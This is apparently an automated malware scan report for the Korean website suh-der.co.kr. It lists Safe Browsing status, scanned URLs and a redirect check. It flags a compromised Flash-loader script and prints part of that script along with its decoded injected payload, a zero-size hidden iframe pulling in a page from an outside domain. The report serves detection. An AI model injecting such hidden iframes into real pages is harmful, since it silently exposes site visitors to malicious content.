Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=suh-der.co.kr
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.suh-der.co.kr/ | 200 OK Content-Length: 18440 Content-Type: text/html | clean |
http://www.suh-der.co.kr/./swf/js/flashObj-1.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.suh-der.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://www.suh-der.co.kr/./swf/js/flashObj.js | 200 OK Content-Length: 2513 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function FlashObject(swf, width, height, flashvars) {
  var strFlashTag = new String();
  if (navigator.appName.indexOf("Microsoft") != -1) {
    strFlashTag += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" ';
    strFlashTag += 'codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=version=8,0,0,0" width="' + width + '" height="' + height + '">';
    strFlashTag += '<p
Decoded script: <iframe src=http://jejunamwon.com/index.html width=0 height=0></iframe>
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: suh-der.co.kr
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: suh-der.co.kr
Referer: http://www.google.com/search?q=suh-der.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.